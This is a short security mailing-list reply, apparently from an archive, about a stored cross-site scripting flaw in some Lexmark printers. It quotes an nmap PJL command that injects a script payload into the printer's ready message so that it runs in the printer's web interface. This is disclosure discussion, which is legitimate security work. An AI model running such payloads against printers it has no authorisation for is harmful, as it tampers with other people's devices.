
Full Disclosure mailing list archives
Re: Amusing xss against some lexmark printers
From: Dan Kaminsky <dan () doxpara com>
Date: Wed, 5 Jan 2011 19:14:49 -0800
You can use nmap to set the RDYMSG of a printer and xss the printer web interface: nmap --script=pjl-ready-message.nse --script-args='pjl_ready_message="<script>alert(1);</script>"' . [0]
*chuckles* What's the rendering engine? WebKit?
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Amusing xss against some lexmark printers dave b (Jan 05)
- Re: Amusing xss against some lexmark printers paul . szabo (Jan 05)
- Re: Amusing xss against some lexmark printers Dan Kaminsky (Jan 05)